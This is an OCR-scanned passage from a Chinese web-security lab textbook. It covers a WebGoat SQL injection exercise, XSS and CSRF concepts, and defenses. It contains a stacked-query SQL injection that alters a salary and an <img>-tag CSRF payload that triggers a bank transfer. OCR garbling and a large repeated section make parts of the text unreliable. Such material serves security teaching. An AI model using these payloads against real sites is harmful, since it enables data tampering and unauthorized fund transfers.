则 最 终 Web 服务 器 传 给 数据 库 执行 的 SQL 语句 为 : 


SELECT salary FROM salaries userid id = 'someuserid'; UPDATE salaries SET salary = 999999 
userid = 'jsmith' 


上 面 的 语句 是 将 原 有 的 查询 改 为 两 条 SQL 语句 , 即 查 询 和 更 新 ,注意 多 条 SQL 语句 
可 以 用 符号 “;:? 分 隔 , 数 据 库 依 次 分 别 执行 ,由 于 someuserid 不 存在 ,SELECT 查询 语句 不 
会 返回 结果 ,而 更 新 语句 会 成 功 。 完 成 攻击 后 ,重新 查看 jsmith 的 薪水 就 会 发 现 修改 
成 功 。 

读者 可 以 自行 完成 并 分 析 WebGoat 里 面 以 下 SQL 注入 例 程 。 

(1) Add Data with SQL Injection: 添加 数据 。 
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(2) Database Backdoors: 数据 库 后 门 。 
(3) Blind Numeric SQL Injection: 数字 型 育 注 入 。 
(4) Blind String SQL Injection: 字符 串 型 盲 注入 。 


6. 思考 题 
分 析 SQL 注入 的 威胁 。 用 户 和 Web 开发 人 员 如 何 防御 SQL 注入 攻击 ? 


Kik 


跨 站 脚本 攻击 


1. 实践 目的 
了 解 网 站 脚本 工作 原理 ,理解 跨 站 脚本 攻击 机 制 。 
2. 实践 环境 


(1) ÆA Internet 的 计算 机 一 台 , 安 装 Windows XP Windows 7 或 
Windows 8 等 操作 系统 。 
(2) 实践 工具 : 具有 漏洞 的 Web 服务 器 (WebGoat) ,Fiddler。 


3. 名 词 解释 


(1) 网 络 脚本 : 结构 化 脚本 Script 是 批 处 理 文件 的 延伸 ,是 一 种 纯 
文本 保存 的 程序 ,一 般 来 说 计算 机 脚本 程序 是 确定 的 一 系列 控制 计算 机 
进行 运算 操作 动作 的 组 合 , 在 其 中 可 以 实现 一 定 的 逻辑 分 支 等 。 脚 本 通 
常 可 以 由 应 用 程序 临时 调用 并 执行 。 各 类 脚本 被 广泛 地 应 用 于 网 页 设 
计 中 ,因为 脚本 不 仅 可 以 减 小 网 页 的 规模 和 提高 网 页 浏览 速度 ,而 且 可 
以 丰富 网 页 的 表现 ,如 动画 、 声 音 等 。 

(2) Cookie: 有 时 也 用 其 复数 形式 Cookies, 指 某 些 网 站 为 了 辨别 用 
户 身份 .进行 session 跟踪 而 存储 在 用 户 本 地 终端 上 的 数据 (通常 经 过 加 
密 )。Cookie 总 是 保存 在 客户 端 中 , 按 在 客户 端 中 的 存储 位 置 , 可 分 为 内 
存 Cookie 和 硬盘 Cookie。 内 存 Cookie 由 浏览 器 维护 ,保存 在 内 存 中 , 浏 
览 器 关闭 后 就 消失 了 ,其 存在 时 间 是 短暂 的 。 硬 盘 Cookie 保存 在 硬盘 
里 ,有 一 个 过 期 时 间 ,除非 用 户 手 工 清理 或 到 了 过 期 时 间 ,硬盘 Cookie 不 
会 被 删除 , 其 存在 时 间 是 长 期 的 。 所 以 , 按 存在 时 间 , 可 分 为 非 持 久 
Cookie 和 持久 Cookie。 

(3) 跨 站 脚本 攻击 : 英语 全 称 是 Cross Site Script, 本 来 缩写 是 CSS, 
但 为 和 层 生 样式 表 (Cascading Style Sheet,CSS) 有 所 区 别 ,所 以 在 安全 
领域 叫做 XSS。XSS 利用 网 站 漏洞 从 用 户 那 里 恶意 盗 取信 息 。 用 户 在 
浏览 网 站 使 用 即时 通信 软件 .甚至 在 阅读 电子 邮件 时 ,通常 会 单 击 其 中 
的 链接 。 攻 击 者 通过 在 链接 中 插入 恶意 代码 ,就 能 够 盗 取 用 户 信息 。 攻 
击 者 通常 会 用 十 六 进 制 (或 其 他 编码 方式 ) 将 链接 编码 ,以 免 用 户 怀疑 它 
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(4) 跨 站 点 请 求 伪造 (CSRF) : Cross-site request forgery, 跨 站 请 求 伪 造 是 一 种 挟 制 终 
端 用 户 在 当前 已 登录 的 Web 应 用 程序 上 执行 非 本 意 的 操作 的 攻击 方法 。 攻 击 者 只 要 借助 
少许 的 社会 工程 诡计 ,例如 通过 电子 邮件 或 者 是 聊天 软件 发 送 的 链接 ,攻击 者 就 能 迫使 一 个 
Web 应 用 程序 的 用 户 去 执行 攻击 者 选择 的 操作 。 


4. 预备 知识 


1) 网 络 脚 本 

网 络 脚 本 主要 有 JavaScript 和 VBScript 两 种 。 

JavaScript 是 一 种 由 Netscape 的 LiveScript 发 展 而 来 的 原型 化 继承 的 基于 对 象 的 动态 
类 型 的 客户 端 脚本 语言 ,区 分 大 小 写 , 是 一 种 轻 量 级 的 编程 语言 ,可 插入 HTML 页 面 的 编 
程 代码 。 插 入 HTML 页 面 后 ,可 由 所 有 的 现代 浏览 器 执行 。 

VBScript 是 Visual Basic Script 的 简称 ,缩写 为 VBS。 它 是 一 种 微软 环境 下 的 轻 量 级 
的 解释 型 语言 ,使 用 COM HPF, WMI, WSH, ADSI 访问 系统 中 的 元 素 ,对 系统 进行 管理 ,可 
以 看 作 是 VB 语言 的 简化 版 ,与 VBA 的 关系 也 非常 密切 。 它 具有 原 语言 容易 学 习 的 特性 。 
目前 这 种 语言 广泛 应 用 于 网 页 和 ASP 程序 制作 ,同时 还 可 以 直接 作为 一 个 可 执行 程序 。 用 
于 调试 简单 的 VB 语句 非常 方便 。 

例如 当 单 击 网 页 上 的 E-mail 地 址 时 能 自动 调用 Outlook Express 或 Foxmail 这 类 邮箱 
软件 ,就 是 通过 脚本 功能 来 实现 的 。 也 正 因为 脚本 的 这 些 特点 ,往往 被 一 些 别有用心 的 人 所 
利用 。 例 如 在 脚本 中 加 入 一 些 破 坏 计算 机 系统 的 命令 ,这 样 当 用 户 浏览 网 页 时 ,一 旦 调用 这 
类 脚本 , 便 会 使 用 户 的 系统 受到 攻击 。 所 以 用 户 应 根据 对 所 访问 网 页 的 信任 程度 选择 安全 
等 级 ,特别 是 对 于 那些 本 身 内 容 就 非法 的 网 页 ,更 不 要 轻易 允许 使 用 脚本 。 通 过 “安全 设置 ” 
对 话 框 ,选择 “脚本 ”选项 下 的 各 种 设置 就 可 以 轻松 实现 对 脚本 的 禁用 和 启用 。 

2) Cookie 

Cookie 是 在 浏览 网 页 的 时 候 , 网 站 服务 器 放 在 客户 端的 txt 文件 。 这 个 文件 里 面 存储 
了 一 些 与 访问 的 这 个 网 站 有 关 的 一 些 信息 ,当下 一 次 访问 这 个 网 站 的 时 候 ,Cookie 就 会 记 
住 上 次 访问 时 候 的 一 些 状 态 或 者 设置 ,让 服务 器 针对 性 地 发 送 页 面 的 相关 内 容 。Cookie 里 
面包 含 的 信息 并 没有 一 个 标准 的 格式 ,各 个 网 站 服务 器 的 规范 都 可 能 不 同 ,但 一 般 会 包括 所 
访问 网 站 的 域名 (domain name) .访问 开始 的 时 间 、 访 问 者 的 IP 地 址 等 客户 端 信息 ,以 及 访 
问 者 关于 这 个 网 站 的 一 些 设置 等 。 比 如 设置 Google 一 个 页 面 要 显示 几 条 搜索 结果 之 类 的 
信息 ,即使 不 登录 Google 账户 ,下 次 访问 时 也 能 够 保存 下 来 ,这 就 是 上 次 访问 时 把 相关 信息 
放 入 了 Cookie 的 效果 。 如 果 是 在 线 购物 网 站 ,还 记录 了 一 些 访问 者 的 购物 车 、 储 物 架 以 及 
访问 者 的 账户 名 等 信息 。 另 外 有 些 网 站 则 会 通过 Cookie 把 访问 者 的 登录 账户 和 密码 记 下 
来 ,这 样 访问 者 下 次 打开 浏览 器 就 会 自动 登录 。 

为 了 安全 起 见 ,Cookie 的 内 容 一 般 都 是 加 密 的 ,只 有 对 应 的 服务 器 才能 读 懂 。 另 外 ,由 
于 Cookie 只 是 txt 文件 ,而 不 是 程序 ,更 不 是 病毒 ,不 能 自己 运行 ,不 会 对 操作 系统 和 其 他 
任何 计算 机 程序 产生 影响 ,也 不 会 通过 Internet 传播 ,因此 它 对 Internet 安全 实际 上 不 构成 
威胁 。 

对 于 网 站 分 析 而 言 ,Cookie 的 作用 在 于 帮助 嵌入 代码 类 的 网 站 分 析 工 具 记 录 网 站 的 访 


实践 教程 


(4) 跨 站 点 请 求 伪造 (CSRF) : Cross-site request forgery, 跨 站 请 求 伪 造 是 一 种 挟 制 终 
端 用 户 在 当前 已 登录 的 Web 应 用 程序 上 执行 非 本 意 的 操作 的 攻击 方法 。 攻 击 者 只 要 借助 
少许 的 社会 工程 诡计 ,例如 通过 电子 邮件 或 者 是 聊天 软件 发 送 的 链接 ,攻击 者 就 能 迫使 一 个 
Web 应 用 程序 的 用 户 去 执行 攻击 者 选择 的 操作 。 


4. 预备 知识 


1) 网 络 脚 本 

网 络 脚 本 主要 有 JavaScript 和 VBScript 两 种 。 

JavaScript 是 一 种 由 Netscape 的 LiveScript 发 展 而 来 的 原型 化 继承 的 基于 对 象 的 动态 
类 型 的 客户 端 脚本 语言 ,区 分 大 小 写 , 是 一 种 轻 量 级 的 编程 语言 ,可 插入 HTML 页 面 的 编 
程 代码 。 插 入 HTML 页 面 后 ,可 由 所 有 的 现代 浏览 器 执行 。 

VBScript 是 Visual Basic Script 的 简称 ,缩写 为 VBS。 它 是 一 种 微软 环境 下 的 轻 量 级 
的 解释 型 语言 ,使 用 COM HPF, WMI, WSH, ADSI 访问 系统 中 的 元 素 ,对 系统 进行 管理 ,可 
以 看 作 是 VB 语言 的 简化 版 ,与 VBA 的 关系 也 非常 密切 。 它 具有 原 语言 容易 学 习 的 特性 。 
目前 这 种 语言 广泛 应 用 于 网 页 和 ASP 程序 制作 ,同时 还 可 以 直接 作为 一 个 可 执行 程序 。 用 
于 调试 简单 的 VB 语句 非常 方便 。 

例如 当 单 击 网 页 上 的 E-mail 地 址 时 能 自动 调用 Outlook Express 或 Foxmail 这 类 邮箱 
软件 ,就 是 通过 脚本 功能 来 实现 的 。 也 正 因为 脚本 的 这 些 特点 ,往往 被 一 些 别有用心 的 人 所 
利用 。 例 如 在 脚本 中 加 入 一 些 破 坏 计算 机 系统 的 命令 ,这 样 当 用 户 浏览 网 页 时 ,一 旦 调用 这 
类 脚本 , 便 会 使 用 户 的 系统 受到 攻击 。 所 以 用 户 应 根据 对 所 访问 网 页 的 信任 程度 选择 安全 
等 级 ,特别 是 对 于 那些 本 身 内 容 就 非法 的 网 页 ,更 不 要 轻易 允许 使 用 脚本 。 通 过 “安全 设置 ” 
对 话 框 ,选择 “脚本 ”选项 下 的 各 种 设置 就 可 以 轻松 实现 对 脚本 的 禁用 和 启用 。 

2) Cookie 

Cookie 是 在 浏览 网 页 的 时 候 , 网 站 服务 器 放 在 客户 端的 txt 文件 。 这 个 文件 里 面 存储 
了 一 些 与 访问 的 这 个 网 站 有 关 的 一 些 信息 ,当下 一 次 访问 这 个 网 站 的 时 候 ,Cookie 就 会 记 
住 上 次 访问 时 候 的 一 些 状 态 或 者 设置 ,让 服务 器 针对 性 地 发 送 页 面 的 相关 内 容 。Cookie 里 
面包 含 的 信息 并 没有 一 个 标准 的 格式 ,各 个 网 站 服务 器 的 规范 都 可 能 不 同 ,但 一 般 会 包括 所 
访问 网 站 的 域名 (domain name) .访问 开始 的 时 间 、 访 问 者 的 IP 地 址 等 客户 端 信息 ,以 及 访 
问 者 关于 这 个 网 站 的 一 些 设置 等 。 比 如 设置 Google 一 个 页 面 要 显示 几 条 搜索 结果 之 类 的 
信息 ,即使 不 登录 Google 账户 ,下 次 访问 时 也 能 够 保存 下 来 ,这 就 是 上 次 访问 时 把 相关 信息 
放 入 了 Cookie 的 效果 。 如 果 是 在 线 购物 网 站 ,还 记录 了 一 些 访问 者 的 购物 车 、 储 物 架 以 及 
访问 者 的 账户 名 等 信息 。 另 外 有 些 网 站 则 会 通过 Cookie 把 访问 者 的 登录 账户 和 密码 记 下 
来 ,这 样 访问 者 下 次 打开 浏览 器 就 会 自动 登录 。 

为 了 安全 起 见 ,Cookie 的 内 容 一 般 都 是 加 密 的 ,只 有 对 应 的 服务 器 才能 读 懂 。 另 外 ,由 
于 Cookie 只 是 txt 文件 ,而 不 是 程序 ,更 不 是 病毒 ,不 能 自己 运行 ,不 会 对 操作 系统 和 其 他 
任何 计算 机 程序 产生 影响 ,也 不 会 通过 Internet 传播 ,因此 它 对 Internet 安全 实际 上 不 构成 
威胁 。 

对 于 网 站 分 析 而 言 ,Cookie 的 作用 在 于 帮助 嵌入 代码 类 的 网 站 分 析 工 具 记 录 网 站 的 访 


问 (Visit) 和 访问 者 (Unique Visitor) 的 信息 ,没有 Cookie 就 无 法 实现 相关 监测 。 而 通过 服 
务 器 端 Log 来 进行 网 站 分 析 的 软件 则 不 需要 Cookie 也 能 实现 相关 分 析 , 因 此 Cookie 只 对 
能 入 代码 类 工具 有 效 , 如 Google Analytics, Omniture, HBX, WebTrends ik A 4R MO SF, 
都 需要 在 网 站 访问 者 的 计算 机 上 放置 Cookie 才能 实现 监测 。 

Cookie 的 数量 是 指 一 个 网 站 可 以 在 客户 端 放 置 Cookie 的 个 数 。 一 个 网 站 并 不 是 只 能 
放置 一 个 Cookie 在 客户 端 ,而 是 根据 需要 ,会 放置 多 个 不 同 的 Cookie。 对 网 站 分 析 工 具 而 
言 , 帮 助 监测 Visit 的 Cookie 和 帮助 监测 Unique Visitor 的 Cookie 就 不 能 是 一 个 ,而 应 该 
分 开设 置 。 对 每 一 个 网 站 ( 域 ) 而 言 ,不同 浏览 器 能 够 支持 的 最 多 Cookie 数 是 不 同 的 。IE7 
和 FireFox 3.0 支持 每 个 网 站 50 个 Cookie, 而 Opera 则 支持 30 个 。 无 论 是 30 个 还 是 50 
个 ,基本 都 够 用 了 。 

3) 跨 站 脚本 攻击 

国际 Web 应 用 安全 组 织 WASC(Web Application Security Consortium) 采 样 分 析 了 
10 297 个 网 站 ,其 中 有 31. 47% 站 点 存在 漏洞 , 且 KSS 在 发 现 的 漏洞 中 占 到 总 数 的 
41.41%, 高 居 榜 首 。XSS 攻击 的 危害 包括 : 盗 取 各 类 用 户 账户 ,如 机 器 登录 账户 ,用户 网 银 
账户 、 各 类 管理 员 账 户 ; 控制 企业 数据 ,包括 读 取 、 算 改 . 添 加 、 删 除 企业 敏感 数据 ,盗窃 企 业 
重要 的 具有 商业 价值 的 资料 ,非法 转账 ,强制 发 送 电子 邮件 ,网 站 挂 马 ,控制 受害 者 机 器 向 其 
他 网 站 发 起 攻击 等 。 典 型 事件 有 : 

(1) 2005 年 ,一 位 叫 Samy 的 MySpace 用 户 自 创 了 一 种 XSS 蠕虫 ,24 小 时 内 ,其 网 络 
空间 朋友 数目 成 功 地 从 73 上升 到 100 万 。 

(2) 2006 年 ,PayPal WA] XSS 攻击 ,攻击 者 将 PayPal 站 点 的 访问 者 重 定向 到 一 个 新 的 
页 面 , 上 面 警告 用 户 他 们 的 账户 已 经 不 再 安全 ,需要 重新 设置 ,并 提示 输入 PayPal 的 登录 信 
息 . 用 户 社 保 信 息 及 信用 卡 信息 。 

(3) 2008 年 5 月 ,eBay 承认 其 PayPal 页 面 存在 XSS 漏洞 ,该 漏洞 会 被 攻击 者 用 于 盗 取 
用 户 证 书 或 Cookie。 

(4) 2011 年 6 月 28 日 晚 ,新 浪 微 博 出 现 了 一 次 比较 大 的 KSS 攻击 事件 。 大 量 用 户 自 
动 发 送 诸如 “ 郭 美美 事件 的 一 些 未 注意 到 的 细节 ”、“ 建 党 大 业 中 穿帮 的 地 方 ”等 微 博 和 私信 ， 
并 自动 关注 一 位 名 为 hellosamy 的 用 户 。 事 件 的 经 过 如 下 : 20:14, 开 始 有 大 量 带 V 的 认证 
用 户 转 发 微 博 和 私信 ; 20:30, 某 网 站 中 的 页 面 无 法 访问 ; 20:32, 新 浪 微 博 中 hellosamy 用 
户 无 法 访问 ; 21:02, 新 浪 漏 洞 修补 完毕 。 

XSS 属于 被 动 式 的 攻击 。 攻 击 者 先 构造 一 个 跨 站 页 面 , 利 用 Script. < IMG >, 
二 IFRAME 放 各 种 方式 使 得 用 户 浏 览 这 个 页 面 时 .触发 对 被 攻击 站 点 的 HTTP 请 求 。 此 
时 ,如 果 被 攻击 者 如 果 已 经 在 被 攻击 站 点 登录 ,就 会 持 有 该 站 点 Cookie。 这 样 该 站 点 会 认 
为 被 攻击 者 发 起 了 一 个 HTTP 请 求 。 而 实际 上 这 个 请 求 是 在 被 攻击 者 不 知情 的 情况 下 发 
起 的 ,由 此 攻击 者 在 一 定 程度 上 达到 了 冒充 被 攻击 者 的 目的 。 精 心地 构造 这 个 攻击 请 求 ,可 
以 达到 冒充 发 文 .夺取 权限 等 多 个 攻击 目的 。 在 常见 的 攻击 实例 中 ,这 个 请 求 是 通过 Script 
来 发 起 的 ,因此 被 称 为 Cross Site Script。 跨 站 脚本 攻击 一 般 有 以 下 两 类 。 

(1) 非 持久 型 XSS: Non-persistent, 又 叫做 反射 XSS(Reflect XSS) , 它 是 指 那些 浏览 
器 每 次 都 要 在 参数 中 提交 恶意 数据 才能 触发 的 跨 站 脚本 漏洞 。 一 般 来 说 ,通过 URL 传人 
恶意 数据 的 都 是 非 持久 型 XSS。 当 然 , 也 有 通过 表单 POST 的 XSS 情况 。 
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(2) 持久 型 XSS; Persistent, 又 叫做 存储 XSS(Stored XSS) ,与 非 持久 型 XSS 相反 , 它 
是 指 通 过 提交 恶意 数据 到 存储 器 (例如 数据 库 、 文 本 文件 等 ), Web 应 用 程序 输出 的 时 候 是 
从 存储 器 中 读 出 恶意 数据 输出 到 页 面 的 一 类 跨 站 脚本 漏洞 。 持 久 型 XSS 多 出 现在 Web 邮 
箱 `. BBS .社区 等 从 数据 库 读 出 数据 的 正常 页 面 (例如 BBS 的 某 篇 帖子 中 可 能 就 含有 恶意 代 
码 ) ,由 于 不 需要 浏览 器 提交 攻击 参数 ,所 以 其 危害 往往 大 于 非 持久 型 XSS。 

4) 跨 站 请 求 伪造 攻击 

CSRF 攻击 方式 在 2000 年 已 经 被 国外 的 安全 人 员 提 出 ,直到 2006 年 国内 才 开始 关注 
该 漏洞 。2008 年 ,国内 外 的 多 个 大 型 社区 和 交互 网 站 分 别 爆 出 CSRF 漏洞 ,如 MetaFilter 
(一 个 大 型 的 BLOG 网 站 ) 的 CSRF 漏洞 允许 攻击 者 劫持 用 户 的 账户 ,YouTube 上 几乎 所 有 
用 户 可 以 执行 的 动作 都 具有 CSRF 漏洞 。 而 现在 ,Internet 上 的 许多 站 点 仍 对 此 毫 无 防备 ， 
以 至 于 安全 业界 称 CSRF 为 “沉睡 的 巨人 ”。 

CSRF 的 攻击 示意 如 图 13-1 所 示 ,在 用 户 正常 登录 系统 以 后 ,攻击 者 诱 使 用 户 访问 一 
些 非法 链接 ,以 执行 一 些 非法 操作 。 跨 站 请 求 中 的 链接 之 所 以 被 正常 执行 ,首先 是 因为 请 求 
中 浏览 器 正常 发 送 了 A 站 的 验证 信息 (一 般 保存 在 Cookie P), A 站 根本 不 知道 该 请 求 是 
用 户 为 之 ,还 是 恶意 为 之 。 其 次 ,请 求 中 的 参数 是 可 以 被 猜测 的 。 这 两 个 条 件 ,构成 了 
CSRF 攻击 的 全 部 条 件 。 需 要 强调 一 下 ,如 果 认 证 基于 Cookie, 那 么 实际 上 还 有 第 3 个 条 
fF: 如 果 Cookie 是 本 地 Cookie ,浏览 器 还 需要 人 允许 跨 域 发 送 本 地 Cookie, 即 如 果 请 求 是 第 
三 方 网 站 发 起 的 ,应 带 上 请 求 的 域 的 Cookie。 
存在 CSRF 漏 洞 的 网 站 :Web A 


攻击 者 :Web B 
受害 者 :User C/Web A 


(6)A 不 知道 (5) 中 的 请 求 是 C 发 出 的 还 是 B 发 出 
的 ,由 于 浏览 器 会 自动 带 上 用 户 C 的 Cookie， 所 
以 A 会 根据 用 户 的 权限 处 理 (5) 的 请 求 ,这 样 B 就 
达到 了 模拟 用 户 操作 的 目的 


(01) 浏览 并 登录 信任 网 站 A 
(验证 通过 ,在 用 户 C 处 产生 A 的 Cookie 一 一 一 一 | 人 人 
一 (5) 根据 B 在 (4) 的 请 求 ,浏览 器 带 着 (2) 处 的 Cookie 访 问 A 一 =| 


用 户 C 


Browser 


— G) 用 户 在 没有 退出 A 网 站 的 情况 下 ,访问 危险 网 站 B —— wb 
ked 
-DB 要 求 访问 第 三 方 站 点 A, 发 出 一 个 请 求 equesb) (Hacked) 


图 13-1 CSRF 的 攻击 示意 图 


目前 ,浏览 器 会 自动 地 发 送 标识 用 户 对 话 的 信息 ,而 无 须 用 户 干预 , 换 句 话 说 , 当 浏 览 器 
发 送 这 些 身份 信息 的 时 候 , 用 户 根本 感觉 不 到 。 假 设 站 点 A 上 有 一 个 Web 应 用 程序 ,并 且 
受害 者 正好 已 经 在 该 站 点 上 通过 了 身份 认证 ,这 时 ,站 点 会 向 受害 者 发 送 一 个 Cookie 作为 
响应 ,这 个 Cookie 的 作用 主要 是 为 了 提高 Web 应 用 的 便利 性 ,被 站 点 作为 用 户 会 话 的 标 
志 , 即 如 果 站 点 收 到 了 带 有 受害 者 的 Cookie 的 请 求 . 那 么 它 就 会 把 这 个 请 求 看 作 是 已 登录 
的 受害 者 发 来 的 。 一 般 情况 下 ,浏览 器 收 到 站 点 设置 的 Cookie 之 后 ,每 当 向 该 站 点 发 送 请 
求 的 时 候 ,浏览 器 都 会 "自动 地 ?连同 该 Cookie 一 起 发 出 。 如 果 Web 应 用 程序 完全 依赖 于 


这 类 信息 来 识别 一 个 用 户 会 话 ,这 就 为 跨 站 请 求 伪 造 创造 了 条 件 。 

【 例 13-1】 典型 的 场景 : 用 户 登录 网 络 银行 去 查看 其 存款 余额 ,没有 退出 网 络 银行 系 
统 就 去 了 某 个 论坛 ,发现 银行 账户 少 了 1000 块 。 原 因 是 银行 网 站 A 违反 了 HTTP 规范 ， 
使 用 GET 请 求 更 新 资源 ,如 请 求 来 完成 银行 转账 的 操作 : 


http://www. mybank. com/Transfer. php?toBankId = 11&money = 1000 


而 攻击 者 在 论坛 中 精心 构造 了 一 个 恶意 的 链接 并 诱 使 该 用 户 点 击 了 该 链接 , 即 : 


< img src = http://www.mybank. com/Transfer. php?toBankId = 11&money = 1000 > 


该 链接 以 GET 的 方式 请 求 银行 网 站 的 图 片 资源 (原本 是 一 个 合法 的 请 求 , 但 被 不 法 
分 子 利 用 了 ) ,于 是 用 户 的 浏览 器 会 带 上 银行 网 站 A 的 Cookie 发 出 GET 请 求 ,去 获取 资 
源 “http:// www. mybank. com/Transfer. php?toBankId 王 11&money 王 1000”, 结 果 银 行 网 
站 服务 器 收 到 请 求 后 ,认为 这 是 一 个 更 新 资源 操作 (转账 操作 ) ,所 以 就 立刻 进行 转账 
操作 。 

当 CSRF 针对 普通 用 户 发 动 攻击 时 ,将 对 终端 用 户 的 数据 和 操作 指令 构成 严重 的 威胁 ; 
当 受 攻击 的 终端 用 户 具有 管理 员 账 户 的 时 候 ,CSRF 攻击 将 危及 整个 Web 应 用 程序 。 

5) 攻击 防范 

XSS 攻击 需要 借助 脚本 语言 ,CSRF 攻击 则 未 必需 要 脚本 语言 。XSS 需要 受害 站 点 接 
受用 户 输入 来 保存 恶意 代码 ,而 CSRF 攻击 可 能 从 第 三 方 网 站 发 起 ; XSS 产生 的 主要 原因 
是 对 用 户 输入 没有 正确 过 滤 ,CSRF 产生 的 主要 原因 是 采用 了 隐 式 的 认证 方式 。 如 果 一 个 
网 站 存在 XSS 漏洞 ,那么 它 很 大 可 能 也 存在 CSRF 漏洞 。 即 使 一 个 网 站 能 够 完美 地 防御 
XSS, 却 未 必 能 够 防御 CSRF。 另 外 ,CSRF 与 KSS 也 不 是 截然 分 开 的 ,一 个 攻击 可 能 既是 
CSRF 攻击 ,又 是 XSS 攻击 。 

(1) 防护 XSS 攻击 。 

O 服务 器 端的 防范 措施 。 

来 自 应 用 安全 国际 组 织 OWASP 的 建议 ,对 XSS 最 佳 的 防护 应 该 结合 以 下 两 种 方法 : 
验证 所 有 输入 数据 ,有 效 检测 攻击 ; 对 所 有 输出 数据 进行 适当 的 编码 ,以 防止 任何 已 成 功 注 
入 的 脚本 在 浏览 器 端 运行 。 具 体 如 下 。 

纪 输 入 验证 : 某 个 数据 被 接受 为 可 被 显示 或 存储 之 前 ,使 用 标准 输入 验证 机 制 ,验证 所 

有 输入 数据 的 长 度 、 类 型 .语法 以 及 业务 规则 。 

艺 输 出 编码 : 数据 输出 前 ,确保 用 户 提 交 的 数据 已 被 正确 进行 entity 编码 ,建议 对 所 有 

字符 进行 编码 而 不 仅 局 限于 某 个 子 集 。 

名 明确 指定 输出 的 编码 方式 : 不 要 允许 攻击 者 为 用 户 选择 编码 方式 (如 ISO 8859 一 1 

或 UTF 8), 
忆 注 意 黑 名 单 验 证 方式 的 局 限 性 : 仅仅 查找 或 替换 一 些 字符 (如 “一”"、“ 记 ”或 类 似 
“script” 的 关键 字 ) ,很 容易 被 XSS 变种 攻击 绕 过 验证 机 制 。 

避 警 惕 规范 化 错误 : 验证 输入 之 前 ,必须 进行 解码 及 规范 化 以 符合 应 用 程序 当前 的 内 

部 表示 方法 。 请 确定 应 用 程序 对 同一 输入 不 做 两 次 解码 。 
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© 客户 端的 防范 措施 。 

当 打 开 一 封 E-mail 或 附件 .浏览 论坛 帖子 时 ,可 能 恶 意 脚本 会 自动 执行 ,因此 在 做 这 些 
操作 时 一 定 要 特别 并 慎 。 建 议 在 浏览 器 设置 中 关闭 JavaScript。 如 果 使 用 IE 浏览 器 ,将 安 
全 级 别 设置 到 “高 ?。 具 体 可 以 参照 浏览 器 安全 的 相关 文章 。 

这 里 需要 再 次 提醒 的 是 ,XSS 攻击 其 实 伴随 着 社会 工程 学 的 成 功 应 用 ,需要 增强 安全 
意识 ,只 信任 值得 信任 的 站 点 或 内 容 。 可 以 通过 一 些 检 测 工具 进行 XSS 的 漏洞 检测 ,类 似 
工具 有 亿 思 网 站 安全 检测 平台 。 针 对 XSS 的 漏洞 带 来 的 危害 是 巨大 的 ,如 有 发 现 ,应 立即 
修复 漏洞 。 

(2) 防护 CSRF 攻击 。 

为 了 防范 CSRF 攻击 ,理论 上 可 以 要 求 对 每 个 发 送 至 该 站 点 的 请 求 都 要 显 式 地 认证 来 
消除 威胁 。 例 如 重新 输入 用 户 名 和 口令 。 但 实际 上 这 会 导致 严重 的 易 用 性 问题 。 所 以 , 提 
出 的 防范 措施 既 要 易于 实行 ,又 不 能 改变 现 有 的 Web 程序 模式 和 用 户 习 惯 ,不 能 显著 降低 
用 户 体 验 。 

O 服务 器 端的 防范 措施 。 

对 于 网 站 所 有 接受 用 户 输 入 的 内 容 进行 严格 的 过 滤 。 这 条 措施 不 止 针 对 CSRF 漏洞 ， 
而 主要 是 减少 XSS 漏洞 的 可 能 性 。 而 一 个 有 XSS 漏洞 的 网 站 很 难保 证 它 对 CSRF 是 安全 
的 。 这 条 措施 是 其 他 安全 措施 的 基础 。 

a GET 方法 只 用 于 从 服务 器 端 读 取 数 据 ,POST 方法 用 于 向 服务 器 端 提交 或 者 修改 数 

据 。 仅 使 用 POST 方法 提交 和 修改 数据 不 能 防范 CSRF 攻击 ,但 是 会 增加 攻击 的 难 
度 。 避 免 攻击 者 简单 地 使 用 二 IMG> 等 标签 就 能 通过 GET 方法 进行 CSRF 攻击 。 
同时 ,这 样 做 也 符合 RFC2616 推荐 的 Web 规范 。 

名 在 所 有 POST 方法 提交 的 数据 中 提供 一 个 不 可 预测 的 参数 ,例如 一 个 随机 数 。 或 者 

一 个 根据 时 间 计 算 的 Hash 值 。 并 且 在 Cookie 中 也 同样 保存 这 个 参数 。 把 这 个 参 
数 能 人 标签 保存 在 Form 表单 中 , 当 浏 览 器 提交 POST 请 求 到 服务 器 端 时 ,从 POST 
数据 中 取出 这 个 参数 并 且 和 Cookie 中 的 值 做 比较 ,如 果 两 个 值 相等 则 认为 请 求 有 
效 ,不 相等 则 拒绝 。 根 据 同 源 策略 和 Cookie 的 安全 策略 ,第 三 方 网 页 是 无 法 取得 
Cookie 中 的 参数 值 的 ,所 以 它 不 能 构造 出 相同 随机 参数 的 POST 请 求 。 

避 在 关键 的 服务 器 端 远程 调用 动作 之 前 .增加 人 机 交互 环节 。 例 如 CAPTCHA 人 机 区 

分 识别 程序 (典型 应 用 如 图 片 验证 码 ) 。 

各 利用 Cookie 安全 策略 中 的 安全 属性 ,但 是 不 要 完全 依赖 Cookie 安全 策略 中 的 安全 

属性 ,只 信任 同 源 策略 ,并 围绕 同 源 策略 来 打造 Web 应 用 程序 的 安全 性 。 
忌 正 确 配 置 网 站 针对 Flash 的 跨 域 策略 文件 。 严 格 限制 跨 域 . 跨 站 的 请 求 。 
@ 客户 端的 防范 措施 。 
忌 保 持 浏览 器 更 新 ,尤其 是 安全 补丁 ,包括 浏览 器 的 Flash 插件 等 的 更 新 。 同 时 也 要 留 
意 操 作 系 统 、 杀 毒 , 防 火 墙 等 软件 的 更 新 。 

避 访 问 敏 感 网 站 (例如 信用 卡 、 网 上 银行 等 ) 后 ,主动 清理 历史 记录 、Cookie 记录 ,表单 
记录 ,密码 记录 ,并 重启 浏览 器 才 访 问 其 他 网 站 。 不 要 在 访问 敏感 网 站 的 同时 上 其 他 
网 站 。 


性 推荐 使 用 某 些 带 有 “隐私 浏览 ”功能 的 浏览 器 ,例如 Safari。“ 隐 私 浏览 ”功能 可 以 让 
用 户 在 上 网 时 不 会 留 下 任何 痕迹 。 浏 览 器 不 会 存储 Cookie 和 其 他 任何 资料 ,从 而 
CSRF 也 拿 不 到 有 用 的 信息 。 


5. 实践 操作 及 步骤 


搭建 实践 环境 WebGoat 步骤 参见 实践 12 。 

1) 存储 型 XSS 

(1) 实践 目标 : 

执行 存储 型 跨 站 脚本 攻击 。 以 “Tom” 身 份 登录 网 站 ,修改 个 人 信息 。 验 证 用 户 Jerry 
是 否 会 受到 攻击 。 每 个 账户 的 密码 是 用 户 明 名 字 的 小 写 ( 如 : Tom 的 密码 是 tom), 

(2) 实践 角色 及 过 程 。 

攻击 者 : A 雇员 。 受 害 者 : B 雇员 。 

